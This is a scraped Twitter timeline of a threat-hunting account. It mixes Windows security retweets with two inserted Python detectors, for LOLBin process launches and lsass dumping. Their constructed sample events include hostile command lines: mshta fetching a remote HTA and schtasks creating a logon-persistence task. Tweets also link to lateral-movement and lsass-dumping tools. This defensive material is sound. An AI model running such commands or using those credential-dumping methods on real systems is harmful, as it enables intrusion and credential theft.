Tweets
Pinned Tweet
Account Logon Flow / Process (#Windows) v0.1
[PDF]: https://speakerdeck.com/rimpq/account-logon-flow-windows …
[DIRECT]: https://speakerd.s3.amazonaws.com/presentations/1c1196d9f4d647b7bcfb9c25cdc28388/windows_account_logon_flow_v0.1.pdf …
...for self-understanding of the logon flow / process in a Windows system. Special thanks to Andrei Miroshnikov
"Find Evil – Know Normal" #SANS #threathunting #blueteam pic.twitter.com/jVuLNRpAZh
Ring3API Retweeted
Need a #ZeroTrust Reference Architecture? Check out this one showing how @Microsoft technology enables this strategy/access model. Slide 14 of CISO Workshop Module 3 @ajohnsocyber @MalwareJake @_sarahyo @RavivTamir @JohnLaTwC #Cybersecurity https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/ciso-workshop-module-3 … pic.twitter.com/t2eChLzW8r
Ring3API Retweeted
#PingCastle 2.8.0.0 released !!! https://pingcastle.com/download/ 4 clicks and 2 <enter>, that's what's between you and the hard truth of your AD security. Example of report: https://pingcastle.com/PingCastleFiles/ad_hc_test.mysmartlogon.com.html … github: https://github.com/vletoux/pingcastle … Changelog: https://raw.githubusercontent.com/vletoux/pingcastle/2.8.0.0/changelog.txt … pic.twitter.com/1oQXuIJcdi
Ring3API Retweeted
Join me and @CptJesus on Tuesday, February 11th as we unveil #BloodHound 3.0! We will demo new attack primitives, performance improvements, and changes in the GUI. Register for the webinar here (recording available afterwards): https://specterops.zoom.us/webinar/register/WN_Ak7pi_zxSM28HBIl5RIVWw … pic.twitter.com/pP4BxRE0tN
Ring3API Retweeted
Like @graylog2 and @TheHive_Project?! Then you'll love our write-up on how to integrate them. http://blog.reconinfosec.com/integrating-graylog-with-thehive/ … #infosec #DFIR
Ring3API Retweeted
Some essential process execution/cmd lines to monitor for initial access/persist. powershell cmd rundll32 control wscript javaw csc regsvr32 reg certutil bitsadmin schtasks wmic eqnedt32 msiexec cmstp mshta hh curl installutil regsvcs/regasm at msbuild sc cscript msxsl runonce
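The watch list in the tweet above is only useful once it is matched against process-creation telemetry with some context attached. The following is an added example, not code from the tweet's author: it takes constructed records shaped like Sysmon Event ID 1 (ProcessCreate) fields (`Image`, `ParentImage`, `CommandLine`), flags any image on the list, and escalates when the parent is an Office, mail or browser process. The parent-based scoring, the set of "initial access" parents and the sample events are this example's own assumptions; the tweet only gives the list of binaries.

```python
"""Match constructed Sysmon-style ProcessCreate events against the tweet's watch list.

Added example (not from the original tweet). The parent-process scoring is an
assumption layered on top of the list; tune INITIAL_ACCESS_PARENTS per estate.
"""
import ntpath
from typing import Optional

# Watch list exactly as given in the tweet; "regsvcs/regasm" expanded into two names.
WATCHED = {
    "powershell", "cmd", "rundll32", "control", "wscript", "javaw", "csc",
    "regsvr32", "reg", "certutil", "bitsadmin", "schtasks", "wmic", "eqnedt32",
    "msiexec", "cmstp", "mshta", "hh", "curl", "installutil", "regsvcs", "regasm",
    "at", "msbuild", "sc", "cscript", "msxsl", "runonce",
}

# Assumption (not in the tweet): a watched binary spawned by one of these parents is
# the initial-access shape worth escalating (macro/exploit document, mail client, browser).
INITIAL_ACCESS_PARENTS = {
    "winword", "excel", "powerpnt", "outlook", "eqnedt32", "msedge", "chrome", "firefox",
}


def base_name(image_path: str) -> str:
    r"""'C:\Windows\System32\RunDll32.EXE' -> 'rundll32' (case-insensitive match key)."""
    name = ntpath.basename(image_path).lower()
    return name[:-4] if name.endswith(".exe") else name


def triage(event: dict) -> Optional[dict]:
    """Return a finding for one ProcessCreate event, or None if the image is not watched."""
    image = base_name(event["Image"])
    if image not in WATCHED:
        return None
    parent = base_name(event.get("ParentImage", ""))
    severity = "high" if parent in INITIAL_ACCESS_PARENTS else "medium"
    return {
        "image": image,
        "parent": parent,
        "severity": severity,
        "command_line": event.get("CommandLine", ""),
    }


def scan(events) -> list:
    """Run triage over a sequence of events and keep only the hits, in input order."""
    return [finding for finding in (triage(e) for e in events) if finding]


# Constructed sample events (not real telemetry); 192.0.2.10 is a documentation address.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "mshta.exe http://192.0.2.10/x.hta"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"schtasks /create /sc onlogon /tn upd /tr C:\Users\Public\u.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

On the constructed input, `cmd.exe` and `schtasks.exe` come back as medium findings and `mshta.exe` launched from WINWORD.EXE as high; `notepad.exe` is not on the list and is ignored. In production the same logic would sit behind a command-line allowlist per binary, since several of these (`cmd`, `powershell`, `sc`, `reg`) run constantly on a healthy host.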
Ring3API Retweeted
I never noticed, some AgentTesla samples install a root cert? https://app.any.run/tasks/97f40768-ac7c-4e07-bc2c-c6838bb9789c … pic.twitter.com/HSz6Rtg4f5
Ring3API Retweeted
Samples are packed with Themida
1.exe --> NuclearBot
9.exe --> Infostealer
4.exe --> downloads tor.exe and 2 AutoIt files (32.exe and 64.exe), possibly a miner (I am still looking into it, process graph below)
#NuclearBot #Infostealer #Themida pic.twitter.com/gOmq5i3HOC
Ring3API Retweeted
Yearly reminder that https://ntdiff.github.io/ by @PetrBenes is awesome sauce pic.twitter.com/kp0JmavIx4
Ring3API Retweeted
Cobalt Strike kit for Lateral Movement https://github.com/0xthirteen/MoveKit …
Ring3API Retweeted
Was testing out Elastic 7.5.2. Not sure when a change was made to the behavior of fields that consist of arrays of keywords (like process.args)... This change 'breaks' a lot of the anticipated behaviors from previous versions for fields like process.args.
Ring3API Retweeted
I've spent a whole day on Sigma. Focus: Facilitate contributions
- New Rule Creation Guide https://github.com/Neo23x0/sigma/wiki/Rule-Creation-Guide …
- New colorised test output
- New test cases
- Rule cleanup (title, date, ids) https://github.com/Neo23x0/sigma/pull/604 …
Next step: How-to guide for pull requests pic.twitter.com/5Iy4NSmiEo
Ring3API Retweeted
Endpoint Isolation with the #Windows Firewall https://medium.com/@cryps1s/endpoint-isolation-with-the-windows-firewall-462a795f4cfb …
Ring3API Retweeted
Uncovering Mimikatz 'msv' and collecting credentials through PyKD https://www.matteomalvica.com/blog/2020/01/20/mimikatz-lsass-dump-windg-pykd/ …
Ring3API Retweeted
In-memory traces of ppldump, exploiting the zam64.sys vulnerable driver to dump lsass memory, cool stuff. Sysmon will show a generic/noisy call trace, so detection chances here are low; if combined with lsass loading dbgcore.dll it may work. https://github.com/realoriginal/ppldump … https://github.com/SouhailHammou/Exploits … pic.twitter.com/rbXCtivW3M
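The tweet above points at a correlation rather than a single signature: a handle opened to lsass.exe (Sysmon Event ID 10, ProcessAccess) is too noisy on its own, but the same window also containing lsass.exe loading dbgcore.dll (Event ID 7, ImageLoad) is not something a healthy host does. The following is an added example, not code from the tweet's author or from the ppldump project: it joins the two event types on a time window and suppresses sources that are expected to touch lsass. The 30-second window, the allowlist of expected accessors, the inclusion of dbghelp.dll (which also exports MiniDumpWriteDump) next to the dbgcore.dll the tweet names, and the sample events are all this example's assumptions.

```python
"""Correlate constructed Sysmon Event ID 10 (ProcessAccess on lsass.exe) with Event ID 7
(lsass.exe loading a minidump DLL) inside a short time window.

Added example (not from the original tweet or from ppldump). Window, allowlist and
sample events are assumptions chosen for illustration.
"""
import ntpath
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=30)  # assumption: how close the two events must be

# Assumption: processes that routinely open lsass.exe on a typical host; tune per estate.
EXPECTED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# dbgcore.dll is the library the tweet names; dbghelp.dll also exports MiniDumpWriteDump.
DUMP_DLLS = {"dbgcore.dll", "dbghelp.dll"}


def is_lsass(path: str) -> bool:
    return ntpath.basename(path).lower() == "lsass.exe"


def correlate(events) -> list:
    """Return one alert per suspicious DLL load in lsass.exe.

    'high'   : a non-allowlisted process opened lsass.exe within WINDOW before the load.
    'medium' : lsass.exe loaded a minidump DLL but no matching access event was seen
               (still abnormal on its own, so it is reported rather than dropped).
    """
    accesses = [e for e in events if e["EventID"] == 10 and is_lsass(e["TargetImage"])]
    loads = [e for e in events if e["EventID"] == 7 and is_lsass(e["Image"])
             and ntpath.basename(e["ImageLoaded"]).lower() in DUMP_DLLS]
    alerts = []
    for load in loads:
        t_load = datetime.fromisoformat(load["UtcTime"])
        dll = ntpath.basename(load["ImageLoaded"]).lower()
        matched = False
        for acc in accesses:
            if acc["SourceImage"].lower() in EXPECTED_SOURCES:
                continue  # expected accessor; not evidence by itself
            delta = t_load - datetime.fromisoformat(acc["UtcTime"])
            if timedelta(0) <= delta <= WINDOW:
                matched = True
                alerts.append({"severity": "high", "source": acc["SourceImage"],
                               "dll": dll, "seconds_apart": delta.total_seconds()})
        if not matched:
            alerts.append({"severity": "medium", "source": None, "dll": dll,
                           "seconds_apart": None})
    return alerts


# Constructed sample events (not real telemetry). Times use Sysmon's UtcTime layout.
SAMPLE_EVENTS = [
    {"EventID": 10, "UtcTime": "2020-01-28 12:00:00",
     "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"EventID": 10, "UtcTime": "2020-01-28 12:00:03",
     "SourceImage": r"C:\Users\Public\dumper.exe",   # hypothetical dumping tool
     "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"EventID": 7, "UtcTime": "2020-01-28 12:00:05",
     "Image": r"C:\Windows\System32\lsass.exe",
     "ImageLoaded": r"C:\Windows\System32\dbgcore.dll"},
    {"EventID": 7, "UtcTime": "2020-01-28 12:00:06",
     "Image": r"C:\Windows\System32\lsass.exe",
     "ImageLoaded": r"C:\Windows\System32\kerberos.dll"},   # normal LSA package load
    {"EventID": 7, "UtcTime": "2020-01-28 13:30:00",
     "Image": r"C:\Windows\System32\lsass.exe",
     "ImageLoaded": r"C:\Windows\System32\dbghelp.dll"},   # load with no nearby access
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

On the sample data the dbgcore.dll load two seconds after `dumper.exe` opened lsass.exe produces a high alert, the svchost.exe access is suppressed by the allowlist, kerberos.dll is ignored, and the later dbghelp.dll load with no nearby access comes out as medium. Both Event ID 7 and Event ID 10 have to be enabled for lsass.exe in the Sysmon configuration for this to fire at all.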
Ring3API Retweeted
Need a SOC Reference Architecture? Check out this one we put together to show how Microsoft technology integrates into a SOC. Slide 73 of Azure Security Compass - https://aka.ms/azuresecuritycompass … @ajohnsocyber @MalwareJake @_sarahyo @RavivTamir @JohnLaTwC pic.twitter.com/hI0eT0Tu14
Ring3API Retweeted
A quick post on why you shouldn't use SYSTEM Tokens when you sandbox a process. Part 1 of N (where I haven't decided how big N is). https://www.tiraniddo.dev/2020/01/dont-use-system-tokens-for-sandboxing.html …
Ring3API Retweeted
I finally got around to publishing my Sysmon deployment method. Hope people find it useful: https://github.com/jokezone/Update-Sysmon …
Ring3API Retweeted
1. Network segmentation
2. Host-based Firewalls
3. Windows Credential Guard/Exploit Guard
4. Applocker
5. Privilege Account Monitoring
6. EDR
7. Sandboxed Office365/Outlook
8. 2FA
9. AMSI
10. MSBuild/Powershell Monitoring
https://twitter.com/jhencinski/status/1221819451617705984?s=20 …